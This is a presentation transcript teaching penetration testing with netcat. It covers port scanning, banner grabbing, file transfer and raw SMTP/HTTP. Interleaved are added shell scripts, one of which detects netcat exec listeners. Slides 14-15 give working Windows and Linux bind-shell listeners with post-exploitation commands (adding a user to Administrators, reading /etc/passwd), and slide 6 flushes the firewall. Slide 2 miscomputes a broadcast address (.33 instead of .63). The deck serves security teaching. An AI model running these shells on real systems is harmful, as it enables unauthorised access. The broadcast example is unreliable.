
Pentest with shell & Perl scripts



Presentation Transcript


  1. Pentest with shell & Perl scripts • Cerutti – IESGF - 2014

  2. Ping broadcast • Look at the netmask of your network. • The broadcast IP is the one that, according to the mask, has all host bits = 1. • For example: • My IP on the network is 10.1.1.30 • The mask is 255.255.255.192 • The broadcast address will be 10.1.1.33
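The rule this slide states (keep the network bits, set every host bit to 1) applied in an added POSIX shell example that is not part of the original deck; it also checks that the mask is contiguous, which the rule silently assumes, and uses the slide's own address and mask as input:

```shell
#!/bin/sh
# Added example (not from the slides): derive broadcast and network addresses
# from an IPv4 address and a dotted-decimal mask using only shell arithmetic.

# ip_to_int 10.1.1.30 -> 167837982 (subshell body keeps the IFS change local)
ip_to_int() (
    IFS=.
    set -- $1
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
)

# int_to_ip 167837982 -> 10.1.1.30
int_to_ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# valid_mask MASK: succeed only if the set bits are contiguous from the left,
# e.g. 255.255.255.192 is valid, 255.0.255.0 is not.
valid_mask() {
    hostbits=$(( $(ip_to_int "$1") ^ 4294967295 ))   # invert within 32 bits
    [ $(( hostbits & (hostbits + 1) )) -eq 0 ]        # 0b0..0111 + 1 is a power of two
}

# broadcast_addr IP MASK: network bits taken from IP, every host bit set to 1
broadcast_addr() {
    valid_mask "$2" || { echo "invalid mask: $2" >&2; return 1; }
    int_to_ip $(( $(ip_to_int "$1") | ($(ip_to_int "$2") ^ 4294967295) ))
}

# network_addr IP MASK: network bits taken from IP, every host bit cleared
network_addr() {
    int_to_ip $(( $(ip_to_int "$1") & $(ip_to_int "$2") ))
}

# Demo with the slide's own values: 10.1.1.30 with mask 255.255.255.192
echo "network:   $(network_addr 10.1.1.30 255.255.255.192)"
echo "broadcast: $(broadcast_addr 10.1.1.30 255.255.255.192)"
```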

  3. root# ping 192.168.0.255 • PING 192.168.0.255 (192.168.0.255): 56 data bytes • 64 bytes from 192.168.0.150: icmp_seq=0 ttl=64 time=0.063 ms • 64 bytes from 192.168.0.165: icmp_seq=0 ttl=64 time=30.095 ms • 64 bytes from 192.168.0.150: icmp_seq=1 ttl=64 time=0.117 ms • 64 bytes from 192.168.0.165: icmp_seq=1 ttl=64 time=17.263 ms

  4. Netcat • According to SecTools.org, Netcat is ranked as the eighth favorite network security tool (Nmap Security Scanner Project, 2011)

  5. http://packetstormsecurity.org/files/download/14051/nc110.tgz • sudo apt-get install netcat-traditional

  6. Disable the firewall • iptables -F

  7. Chat interface

  8. Hypervisors

  9. Connecting to a port • Connect to any high port, for example TCP port 1234 • $ nc -l 1234 • nc is now listening on port 1234 for a connection. On a second console (or a second machine), connect to the machine and port being listened on: • $ nc 127.0.0.1 1234

  10. chat

  11. Transferring data with Netcat • -vv (double v) for additional verbosity that will give you the number of bytes transferred during a file transfer. The -w switch instructs Netcat to wait for a specific number of seconds before timing out the connection. In our example, we specify 30 seconds

  12. Transfer on Mac OS X • nc -v -w 30 -p 1234 -l > secret.txt • Start by using nc to listen on a specific port, with output captured into a file: • $ nc -l 1234 > filename.out • Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred: • $ nc host.example.com 1234 < filename.in • After the file has been transferred, the connection will close automatically.

  13. Banner grabbing with Netcat

  14. Windows remote shell (and simple post-exploitation hi-jinks) • Preparing the listener • nc -Lp 31337 -vv -e cmd.exe • Connecting to the target • nc 192.168.0.10 31337 • Dir c:/ • Md /invasao • net localgroup Administrators bob

  15. Linux shell • sudo nc -lp 31337 -e /bin/bash • Connecting to the target • As I have demonstrated in the previous exercise, you simply connect to the host (as shown below) and the port that you want to connect to, and the listener will serve up the bash shell for you as follows: • nc 192.168.0.11 31337 • grep bob /etc/passwd
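A defender-side counterpart to slides 14 and 15, added here and not part of the original deck: a POSIX shell function that scans process-list lines (a constructed sample is embedded below; in practice the output of `ps -eo pid,args --no-headers`) for netcat variants launched with a command-execution option, which is what both listeners rely on.

```shell
#!/bin/sh
# Added example (not from the slides): flag netcat processes started with an
# exec option (-e, -c, --exec, --sh-exec, --lua-exec), the ingredient of the
# listeners on slides 14 and 15. Reads "PID ARGS" lines on stdin.

flag_nc_shells() {
    awk '
    {
        exe = $2; sub(/.*\//, "", exe)            # basename of the program
        if (exe !~ /^(nc|ncat|netcat|nc\.traditional|nc\.openbsd)$/) next
        for (i = 3; i <= NF; i++) {
            # long options, or a short-option cluster that contains e or c
            if ($i ~ /^--(sh-|lua-)?exec$/ || $i ~ /^-[a-zA-Z]*[ec][a-zA-Z]*$/) {
                line = ""
                for (j = 2; j <= NF; j++) line = line (j > 2 ? " " : "") $j
                print "ALERT pid=" $1 " exe=" exe " runs=" $(i + 1) " cmdline=" line
                break
            }
        }
    }'
}

# count_nc_shells: same input, prints the number of flagged processes
count_nc_shells() {
    flag_nc_shells | awk 'END { print NR }'
}

# Constructed sample (not real data): lines 2 and 3 should be flagged,
# the -zv port scan on line 4 and the bash -c on line 5 should not.
SAMPLE_PS='  812 /usr/sbin/sshd -D
 1337 nc -lp 31337 -e /bin/bash
 1402 /usr/bin/ncat --sh-exec cmd.exe -l 4444
 1500 nc -zv 192.168.0.10 21-25
 1611 /bin/bash -c sleep 30'

printf '%s\n' "$SAMPLE_PS" | flag_nc_shells
```

On a live host, replace the sample with `ps -eo pid,args --no-headers | flag_nc_shells`; a hit is worth correlating with the listening socket (`ss -ltnp`) before acting on it.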

  16. Opening web pages on the server • $ printf 'GET / HTTP/1.0\r\n\r\n' | nc host.example.com 80

  17. Sending email • $ nc localhost 25 << EOF • HELO host.example.com • MAIL FROM: <user@host.example.com> • RCPT TO: <user2@host.example.com> • DATA • Body of email. • . • QUIT • EOF

  18. Port scanning • $ nc -zv host.example.com 20-30 • Connection to host.example.com 22 port [tcp/ssh] succeeded! • Connection to host.example.com 25 port [tcp/smtp] succeeded! • The port range was specified to limit the search to ports 20 - 30.

  19. Which server software is running, and which versions • First make a connection, and then break the connection when the banner has been retrieved. This can be accomplished by specifying a small timeout with the -w flag, or perhaps by issuing a "QUIT" command to the server: • $ echo "QUIT" | nc host.example.com 20-30 • SSH-1.99-OpenSSH_3.6.1p2 • Protocol mismatch. • 220 host.example.com IMS SMTP Receiver Version 0.84 Ready

  20. Open a TCP connection to port 42 of host.example.com using 10.1.2.3 as the IP for the local end of the connection: • $ nc -s 10.1.2.3 host.example.com 42 • Create and listen on a Unix Domain Socket: • $ nc -lU /var/tmp/dsocket • Connect to port 42 of host.example.com via an HTTP proxy at 10.2.3.4, port 8080. This example could also be used by ssh(1); see the ProxyCommand directive in ssh_config(5) for more information. • $ nc -x10.2.3.4:8080 -Xconnect host.example.com 42

  21. Scanning a range of devices with a script • for i in {10..12}; do nc -vv -n -w 1 192.168.0.$i 21-25 -z; done
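The slide-18 output and the slide-21 loop combined into an added shell example that is not part of the original deck: one function turns netcat's verbose scan output into `host port service` lines (it understands the OpenBSD-style line shown on slide 18 and the traditional nc format), and the slide-21 loop, generalised to any host range, feeds it. Netcat writes these lines to stderr, hence the `2>&1`.

```shell
#!/bin/sh
# Added example (not from the slides): report open ports found by nc -z.
# Understands both output dialects:
#   OpenBSD nc:      Connection to host.example.com 22 port [tcp/ssh] succeeded!
#   nc.traditional:  host.example.com [192.0.2.10] 22 (ssh) open
parse_nc_scan() {
    awk '
    /^Connection to .* succeeded!$/ {
        svc = $6; gsub(/\[tcp\/|\]/, "", svc)     # "[tcp/ssh]" -> "ssh"
        print $3, $4, svc; next
    }
    /\) open$/ {
        svc = $4; gsub(/[()]/, "", svc)           # "(ssh)" -> "ssh"
        print $1, $3, svc
    }'
}

# scan_hosts PREFIX FIRST LAST PORTS: the slide-21 loop over any host range,
# with the connection-refused noise stripped by parse_nc_scan.
# Example: scan_hosts 192.168.0 10 12 21-25
scan_hosts() {
    i=$2
    while [ "$i" -le "$3" ]; do
        nc -vv -n -w 1 -z "$1.$i" "$4" 2>&1
        i=$((i + 1))
    done | parse_nc_scan
}

# Constructed sample output (not from a real scan) to exercise the parser;
# the refused lines must be dropped, the open ones reported.
SAMPLE_SCAN='Connection to host.example.com 22 port [tcp/ssh] succeeded!
Connection to host.example.com 25 port [tcp/smtp] succeeded!
nc: connect to host.example.com port 23 (tcp) failed: Connection refused
192.168.0.11 [192.168.0.11] 21 (ftp) open
(UNKNOWN) [192.168.0.12] 21 (ftp) : Connection refused'

printf '%s\n' "$SAMPLE_SCAN" | parse_nc_scan
```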

  22. Official sites • Unix Netcat Homepage: http://nc110.sourceforge.net/ • GNU Netcat Project: http://netcat.sourceforge.net/ • Ncat – The Nmap Project: http://www.nmap.org/ncat

  23. Articles and tutorials • Offensive Security explains how to create a persistent backdoor using Netcat and Metasploit's Meterpreter: • http://www.offensive-security.com/metasploit-unleashed/Persistent_Netcat_Backdoor • Crazy Netcat Relays for Fun and Profit: • http://pauldotcom.com/wiki/index.php/Episode195#Tech_Segment:_Crazy-Ass_Netcat_Relays_for_Fun_and_Profit • SANS Institute Netcat Pocket Cheatsheet: • http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf • Some interesting use cases not covered in this book by Johannes Franken: • http://www.jfranken.de/homepages/johannes/vortraege/netcat.en.html • A great reference for using Netcat for debugging SOAP and XML web services: • http://parand.com/say/index.php/2005/03/11/simple-recipe-for-debugging-web-services/

  24. Twitter • Follow Thomas Wilhelm on Twitter: • https://twitter.com/#!/thomas_wilhelm • Follow Brian Baskin on Twitter: • https://twitter.com/#!/bbaskin • Follow Michael Scherer on Twitter: • https://twitter.com/#!/theprez98 • Follow Ed Skoudis on Twitter: • https://twitter.com/#!/edskoudis • For more Open Source information, follow Packt at: • http://twitter.com/#!/packtopensource
